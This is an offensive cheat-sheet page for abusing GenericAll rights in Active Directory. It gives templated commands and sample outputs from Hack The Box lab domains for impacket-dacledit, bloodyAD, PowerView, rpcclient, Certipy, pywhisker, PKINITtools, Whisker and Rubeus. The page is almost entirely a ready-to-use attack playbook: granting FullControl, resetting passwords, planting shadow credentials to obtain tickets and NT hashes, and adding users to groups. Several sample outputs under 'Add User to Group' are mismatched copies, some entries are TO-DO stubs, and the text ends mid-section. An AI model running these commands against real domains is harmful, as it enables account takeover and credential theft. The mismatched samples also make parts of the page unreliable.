TLDRBins TLDRBins / GenericAll


Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Authentication Method

Add Full Control / GenericAll over Target Identity

# Password impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: $ impacket-dacledit 'haze.htb/haze-it-backup$:Password123!' -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20251031-215454.bak [*] DACL modified successfully!
# NTLM impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: $ impacket-dacledit 'haze.htb/haze-it-backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20251031-215454.bak [*] DACL modified successfully!
# Password-based Kerberos sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>:<PASSWORD>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: $ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$:Password123!' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20251031-220251.bak [*] DACL modified successfully!
# NTLM-based Kerberos sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>' -hashes ':<HASH>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: $ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$' -hashes ':735c02c6b2dc54c3c8c6891f55279ebc' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20251031-220251.bak [*] DACL modified successfully!
# Ticket-based Kerberos sudo ntpdate -s <DC_IP> && impacket-dacledit '<DOMAIN>/<USER>' -k -dc-ip <DC> -principal '<USER>' -target '<TARGET_IDENTITY>' -inheritance -action write -rights FullControl
Sample Output: $ sudo ntpdate -s 10.129.232.50 && impacket-dacledit 'haze.htb/haze-it-backup$' -k -dc-ip dc01.haze.htb -principal 'haze-it-backup$' -target 'SUPPORT_SERVICES' -inheritance -action write -rights FullControl Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [-] CCache file is not found. Skipping... [*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU [*] DACL backed up to dacledit-20251031-220251.bak [*] DACL modified successfully!
# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Password-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM-based Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Ticket-based Kerberos bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add genericAll '<TARGET_IDENTITY>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES

1. Connect

# Password powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'
Sample Output: $ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# NTLM powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>'
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# Password-based Kerberos powerview '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$:Password123!@DC01.haze.htb' -k ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# NTLM-based Kerberos powerview '<DOMAIN>/<USER>@<TARGET>' -H '<HASH>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯
# Ticket-based Kerberos powerview '<DOMAIN>/<USER>@<TARGET>' -k
Sample Output: $ powerview 'haze.htb/haze-it-backup$@DC01.haze.htb' -k --no-pass ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯

2. Add Full Control Over Target Identity

Add-DomainObjectAcl -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>' -Rights fullcontrol
Sample Output: ╭─LDAPS─[dc01.haze.htb]─[HAZE\Haze-IT-Backup$]-[NS:<auto>] ╰─PV ❯ Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights fullcontrol [2025-10-31 22:15:34] [Add-DomainObjectACL] Found target identity: CN=Support_Services,CN=Users,DC=haze,DC=htb [2025-10-31 22:15:34] [Add-DomainObjectACL] Found principal identity: CN=Haze-IT-Backup,CN=Managed Service Accounts,DC=haze,DC=htb [2025-10-31 22:15:34] Adding FullControl to S-1-5-21-323145914-28650650-2368316563-1112 [2025-10-31 22:15:34] [Add-DomainObjectACL] Success! Added ACL to CN=Support_Services,CN=Users,DC=haze,DC=htb

dsacls "<TARGET_DN>" /G "<TARGET_IDENTITY>:GA" /I:T
Sample Output: TO-DO

1. Import PowerView.ps1

. .\PowerView.ps1
Sample Output: evil-winrm-py PS C:\programdata> . .\PowerView.ps1

2. Add Full Control Over Target Identity

Add-DomainObjectAcl -TargetIdentity '<TARGET_IDENTITY>' -PrincipalIdentity '<USER>' -Rights All -DomainController <DC>
Sample Output: evil-winrm-py PS C:\programdata> Add-DomainObjectAcl -TargetIdentity 'SUPPORT_SERVICES' -PrincipalIdentity 'haze-it-backup$' -Rights All -DomainController dc01.haze.htb


Change Target User Password

# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO
# Password-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO
# NTLM-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO
# Ticket-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output: TO-DO
# Password rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output: $ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Password123!'

Set-ADAccountPassword -Identity "<TARGET_USER>" -NewPassword (ConvertTo-SecureString "<NEW_PASSWORD>" -AsPlainText -Force) -Reset
Sample Output: TO-DO

1. Import PowerView

. .\PowerView.ps1
Sample Output: *Evil-WinRM* PS C:\programdata> . .\PowerView.ps1

2. Change Target User Password

$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output: *Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password
Sample Output: *Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password


Shadow Credential

# Password certipy-ad shadow auto -username '<USER>@<DOMAIN>' -p <PASSWORD> -account <TARGET_USER> -target <DC> -dc-ip <DC_IP>
Sample Output: $ certipy-ad shadow auto -username 'haze-it-backup$@haze.htb' -p 'Password123!' -account edward.martin -target DC01.haze.htb -dc-ip 10.129.232.50 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Targeting user 'edward.martin' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '27690c0aa0d54edaa91a2abc456f98a0' [*] Adding Key Credential with device ID '27690c0aa0d54edaa91a2abc456f98a0' to the Key Credentials for 'edward.martin' [*] Successfully added Key Credential with device ID '27690c0aa0d54edaa91a2abc456f98a0' to the Key Credentials for 'edward.martin' [*] Authenticating as 'edward.martin' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'edward.martin@haze.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'edward.martin.ccache' File 'edward.martin.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y [*] Wrote credential cache to 'edward.martin.ccache' [*] Trying to retrieve NT hash for 'edward.martin' [*] Restoring the old Key Credentials for 'edward.martin' [*] Successfully restored the old Key Credentials for 'edward.martin' [*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
# NTLM certipy-ad shadow auto -username '<USER>@<DOMAIN>' -hashes '<HASH>' -account <TARGET_USER> -target <DC> -dc-ip <DC_IP>
Sample Output: $ certipy-ad shadow auto -username 'haze-it-backup$@haze.htb' -hashes '735c02c6b2dc54c3c8c6891f55279ebc' -account edward.martin -target DC01.haze.htb -dc-ip 10.129.232.50 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Targeting user 'edward.martin' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '27690c0aa0d54edaa91a2abc456f98a0' [*] Adding Key Credential with device ID '27690c0aa0d54edaa91a2abc456f98a0' to the Key Credentials for 'edward.martin' [*] Successfully added Key Credential with device ID '27690c0aa0d54edaa91a2abc456f98a0' to the Key Credentials for 'edward.martin' [*] Authenticating as 'edward.martin' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'edward.martin@haze.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'edward.martin.ccache' File 'edward.martin.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename): y [*] Wrote credential cache to 'edward.martin.ccache' [*] Trying to retrieve NT hash for 'edward.martin' [*] Restoring the old Key Credentials for 'edward.martin' [*] Successfully restored the old Key Credentials for 'edward.martin' [*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
# Password-based Kerberos certipy-ad shadow auto -username '<USER>@<DOMAIN>' -p <PASSWORD> -k -account <TARGET_USER> -target <DC> -dc-host <DC> -dc-ip <DC_IP>
Sample Output: $ certipy-ad shadow auto -username 'haze-it-backup$@haze.htb' -p 'Password123!' -k -account edward.martin -target DC01.haze.htb -dc-host DC01.haze.htb -dc-ip 10.129.232.50 Certipy v5.0.3 - by Oliver Lyak (ly4k) [!] KRB5CCNAME environment variable not set [*] Targeting user 'edward.martin' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '60ceba8fb2f14695975a2e8eb58e58d8' [*] Adding Key Credential with device ID '60ceba8fb2f14695975a2e8eb58e58d8' to the Key Credentials for 'edward.martin' [*] Successfully added Key Credential with device ID '60ceba8fb2f14695975a2e8eb58e58d8' to the Key Credentials for 'edward.martin' [*] Authenticating as 'edward.martin' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'edward.martin@haze.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'edward.martin.ccache' [*] Wrote credential cache to 'edward.martin.ccache' [*] Trying to retrieve NT hash for 'edward.martin' [*] Restoring the old Key Credentials for 'edward.martin' [*] Successfully restored the old Key Credentials for 'edward.martin' [*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
# NTLM-based Kerberos certipy-ad shadow auto -username '<USER>@<DOMAIN>' -hashes '<HASH>' -k -account <TARGET_USER> -target <DC> -dc-host <DC> -dc-ip <DC_IP>
Sample Output: $ certipy-ad shadow auto -username 'haze-it-backup$@haze.htb' -hashes '735c02c6b2dc54c3c8c6891f55279ebc' -k -account edward.martin -target DC01.haze.htb -dc-host DC01.haze.htb -dc-ip 10.129.232.50 Certipy v5.0.3 - by Oliver Lyak (ly4k) [!] KRB5CCNAME environment variable not set [*] Targeting user 'edward.martin' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '60ceba8fb2f14695975a2e8eb58e58d8' [*] Adding Key Credential with device ID '60ceba8fb2f14695975a2e8eb58e58d8' to the Key Credentials for 'edward.martin' [*] Successfully added Key Credential with device ID '60ceba8fb2f14695975a2e8eb58e58d8' to the Key Credentials for 'edward.martin' [*] Authenticating as 'edward.martin' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'edward.martin@haze.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'edward.martin.ccache' [*] Wrote credential cache to 'edward.martin.ccache' [*] Trying to retrieve NT hash for 'edward.martin' [*] Restoring the old Key Credentials for 'edward.martin' [*] Successfully restored the old Key Credentials for 'edward.martin' [*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af
# Ticket-based Kerberos certipy-ad shadow auto -username '<USER>@<DOMAIN>' -k -account <TARGET_USER> -target <DC> -dc-host <DC> -dc-ip <DC_IP>
Sample Output: $ certipy-ad shadow auto -username 'haze-it-backup$@haze.htb' -k -account edward.martin -target DC01.haze.htb -dc-host DC01.haze.htb -dc-ip 10.129.232.50 Certipy v5.0.3 - by Oliver Lyak (ly4k) [*] Targeting user 'edward.martin' [*] Generating certificate [*] Certificate generated [*] Generating Key Credential [*] Key Credential generated with DeviceID '60ceba8fb2f14695975a2e8eb58e58d8' [*] Adding Key Credential with device ID '60ceba8fb2f14695975a2e8eb58e58d8' to the Key Credentials for 'edward.martin' [*] Successfully added Key Credential with device ID '60ceba8fb2f14695975a2e8eb58e58d8' to the Key Credentials for 'edward.martin' [*] Authenticating as 'edward.martin' with the certificate [*] Certificate identities: [*] No identities found in this certificate [*] Using principal: 'edward.martin@haze.htb' [*] Trying to get TGT... [*] Got TGT [*] Saving credential cache to 'edward.martin.ccache' [*] Wrote credential cache to 'edward.martin.ccache' [*] Trying to retrieve NT hash for 'edward.martin' [*] Restoring the old Key Credentials for 'edward.martin' [*] Successfully restored the old Key Credentials for 'edward.martin' [*] NT hash for 'edward.martin': 09e0b3eeb2e7a6b0d419e9ff8f4d91af

1. Add Shadow Credentials

# Password python3 pywhisker.py -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --dc-ip <DC_IP> --action add -t '<TARGET_USER>' --use-ldaps
Sample Output: $ python3 pywhisker.py --action add -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --dc-ip 10.129.232.50 -t 'edward.martin' --use-ldaps [*] Searching for the target account [*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: b5a6cbe1-20dd-ef0c-7231-ca295fb7a044 [*] Updating the msDS-KeyCredentialLink attribute of edward.martin [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] Converting PEM -> PFX with cryptography: WYwZ8GQT.pfx [+] PFX exportiert nach: WYwZ8GQT.pfx [i] Passwort für PFX: k9Z5Q2g87lakxIoE7rd2 [+] Saved PFX (#PKCS12) certificate & key at path: WYwZ8GQT.pfx [*] Must be used with password: k9Z5Q2g87lakxIoE7rd2 [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
# NTLM python3 pywhisker.py -d <DOMAIN> -u '<USER>' -H '<HASH>' --dc-ip <DC_IP> --action add -t '<TARGET_USER>' --use-ldaps
Sample Output: $ python3 pywhisker.py --action add -d haze.htb -u 'haze-it-backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' --dc-ip 10.129.232.50 -t 'edward.martin' --use-ldaps [*] Searching for the target account [*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: b5a6cbe1-20dd-ef0c-7231-ca295fb7a044 [*] Updating the msDS-KeyCredentialLink attribute of edward.martin [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] Converting PEM -> PFX with cryptography: WYwZ8GQT.pfx [+] PFX exportiert nach: WYwZ8GQT.pfx [i] Passwort für PFX: k9Z5Q2g87lakxIoE7rd2 [+] Saved PFX (#PKCS12) certificate & key at path: WYwZ8GQT.pfx [*] Must be used with password: k9Z5Q2g87lakxIoE7rd2 [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
# Password-based Kerberos python3 pywhisker.py -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --dc-ip <DC_IP> --action add -t '<TARGET_USER>' --use-ldaps
Sample Output: $ python3 pywhisker.py -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --dc-ip 10.129.232.50 --action add -t 'edward.martin' --use-ldaps [*] Searching for the target account [*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: b5a6cbe1-20dd-ef0c-7231-ca295fb7a044 [*] Updating the msDS-KeyCredentialLink attribute of edward.martin [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] Converting PEM -> PFX with cryptography: WYwZ8GQT.pfx [+] PFX exportiert nach: WYwZ8GQT.pfx [i] Passwort für PFX: k9Z5Q2g87lakxIoE7rd2 [+] Saved PFX (#PKCS12) certificate & key at path: WYwZ8GQT.pfx [*] Must be used with password: k9Z5Q2g87lakxIoE7rd2 [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
# NTLM-based Kerberos python3 pywhisker.py -d <DOMAIN> -u '<USER>' -H '<HASH>' -k --dc-ip <DC_IP> --action add -t '<TARGET_USER>' --use-ldaps
Sample Output: $ python3 pywhisker.py -d haze.htb -u 'haze-it-backup$' -H '735c02c6b2dc54c3c8c6891f55279ebc' -k --dc-ip 10.129.232.50 --action add -t 'edward.martin' --use-ldaps [*] Searching for the target account [*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: b5a6cbe1-20dd-ef0c-7231-ca295fb7a044 [*] Updating the msDS-KeyCredentialLink attribute of edward.martin [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] Converting PEM -> PFX with cryptography: WYwZ8GQT.pfx [+] PFX exportiert nach: WYwZ8GQT.pfx [i] Passwort für PFX: k9Z5Q2g87lakxIoE7rd2 [+] Saved PFX (#PKCS12) certificate & key at path: WYwZ8GQT.pfx [*] Must be used with password: k9Z5Q2g87lakxIoE7rd2 [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
# Ticket-based Kerberos python3 pywhisker.py -d <DOMAIN> -u '<USER>' -k --dc-ip <DC_IP> --action add -t '<TARGET_USER>' --use-ldaps
Sample Output: $ python3 pywhisker.py -d haze.htb -u 'haze-it-backup$' -k --dc-ip 10.129.232.50 --action add -t 'edward.martin' --use-ldaps [*] Searching for the target account [*] Target user found: CN=Edward Martin,CN=Users,DC=haze,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID: b5a6cbe1-20dd-ef0c-7231-ca295fb7a044 [*] Updating the msDS-KeyCredentialLink attribute of edward.martin [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] Converting PEM -> PFX with cryptography: WYwZ8GQT.pfx [+] PFX exportiert nach: WYwZ8GQT.pfx [i] Passwort für PFX: k9Z5Q2g87lakxIoE7rd2 [+] Saved PFX (#PKCS12) certificate & key at path: WYwZ8GQT.pfx [*] Must be used with password: k9Z5Q2g87lakxIoE7rd2 [*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

2. Request a Ticket Using the PFX

python3 gettgtpkinit.py -cert-pfx <PFX_FILE> -pfx-pass '<GENERATED_PASSWORD>' '<DOMAIN>/<TARGET_USER>' '<TARGET_USER>.ccache' -dc-ip <DC>
Sample Output: $ python3 gettgtpkinit.py -cert-pfx WYwZ8GQT.pfx -pfx-pass 'k9Z5Q2g87lakxIoE7rd2' 'haze.htb/edward.martin' 'edward.martin.ccache' -dc-ip dc01.haze.htb 2025-10-31 20:24:22,412 minikerberos INFO Loading certificate and key from file INFO:minikerberos:Loading certificate and key from file 2025-10-31 20:24:22,420 minikerberos INFO Requesting TGT INFO:minikerberos:Requesting TGT 2025-10-31 20:24:36,391 minikerberos INFO AS-REP encryption key (you might need this later): INFO:minikerberos:AS-REP encryption key (you might need this later): 2025-10-31 20:24:36,391 minikerberos INFO 62414608995ff5382ef6657aad37038beaa512c8e65de94f3302f1771738acd5 INFO:minikerberos:62414608995ff5382ef6657aad37038beaa512c8e65de94f3302f1771738acd5 2025-10-31 20:24:36,393 minikerberos INFO Saved TGT to file INFO:minikerberos:Saved TGT to file

3. Get NTLM Hash

# Pass-the-ticket export KRB5CCNAME=<TARGET_USER>.ccache
Sample Output: TO-DO
# Get NTLM hash python3 getnthash.py '<DOMAIN>/<TARGET_USER>' -key <AS_REP_ENC_KEY>
Sample Output: $ python3 getnthash.py 'haze.htb/edward.martin' -key 62414608995ff5382ef6657aad37038beaa512c8e65de94f3302f1771738acd5 Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Using TGT from cache [*] Requesting ticket to self with PAC Recovered NT Hash 09e0b3eeb2e7a6b0d419e9ff8f4d91af

Ref: pywhisker
Ref: PKINITtools

1. Add Shadow Credentials

.\whisker.exe add /domain:<DOMAIN> /target:'<TARGET_USER>' /dc:<DC> /password:'<PFX_PASSWORD>'
Sample Output: PS C:\programdata> .\whisker.exe add /domain:outdated.htb /target:'sflowers' /dc:10.10.11.175 /password:'Test1234' [*] No path was provided. The certificate will be printed as a Base64 blob [*] Searching for the target account [*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb [*] Generating certificate [*] Certificate generated [*] Generating KeyCredential [*] KeyCredential generated with DeviceID 06a332a6-1ef1-4e73-bb9b-f5e5d1f9e963 [*] Updating the msDS-KeyCredentialLink attribute of the target object [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] You can now run Rubeus with the following syntax: Rubeus.exe asktgt /user:sflowers /certificate:MIIJuAIBAz .---[SNIP]--- TvhwICB9A= /password:"Test1234" /domain:outdated.htb /dc:10.10.11.175 /getcredentials /show

2. Request a Ticket Using the PFX File and Get NTLM Hash

.\rubeus.exe asktgt /user:'<TARGET_USER>' /certificate:'<BASE64_PFX>' /password:'<PFX_PASSWORD>' /domain:<DOMAIN> /dc:<DC> /getcredentials /show
Sample Output: PS C:\programdata> .\Rubeus.exe asktgt /user:sflowers /certificate:'MIIJuAIBAz .---[SNIP]--- TvhwICB9A=' /password:"Test1234" /domain:outdated.htb /dc:10.10.11.175 /getcredentials /show ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.0 [*] Action: Ask TGT [*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers [*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers' [*] Using domain controller: 10.10.11.175:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIF0jCCBc ---[SNIP]--- F0ZWQuaHRi ServiceName : krbtgt/outdated.htb ServiceRealm : OUTDATED.HTB UserName : sflowers UserRealm : OUTDATED.HTB StartTime : 9/22/2024 10:57:36 AM EndTime : 9/22/2024 8:57:36 PM RenewTill : 9/29/2024 10:57:36 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : vqosgxeFibuRzlIPfnejKQ== ASREP (key) : 1E1FB4543905764478F7F129026B67A6 [*] Getting credentials using U2U CredentialInfo : Version : 0 EncryptionType : rc4_hmac CredentialData : CredentialCount : 1 NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5

Ref: Whisker.exe


Add User to Group

1. Add User to Group

# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p ':735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Password-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p 'Password123!' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# NTLM-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -p '<HASH>' -f rc4 -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -p '735c02c6b2dc54c3c8c6891f55279ebc' -f rc4 -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES
# Ticket-based Kerberos sudo ntpdate -s <DC_IP> && bloodyAD -d <DOMAIN> -u '<USER>' -k --host <DC> add groupMember '<GROUP>' '<USER>'
Sample Output: $ bloodyAD -d haze.htb -u 'haze-it-backup$' -k --host dc01.haze.htb add genericAll 'SUPPORT_SERVICES' 'haze-it-backup$' [+] haze-it-backup$ has now GenericAll on SUPPORT_SERVICES

2. Check

# Password bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> get object '<GROUP>'
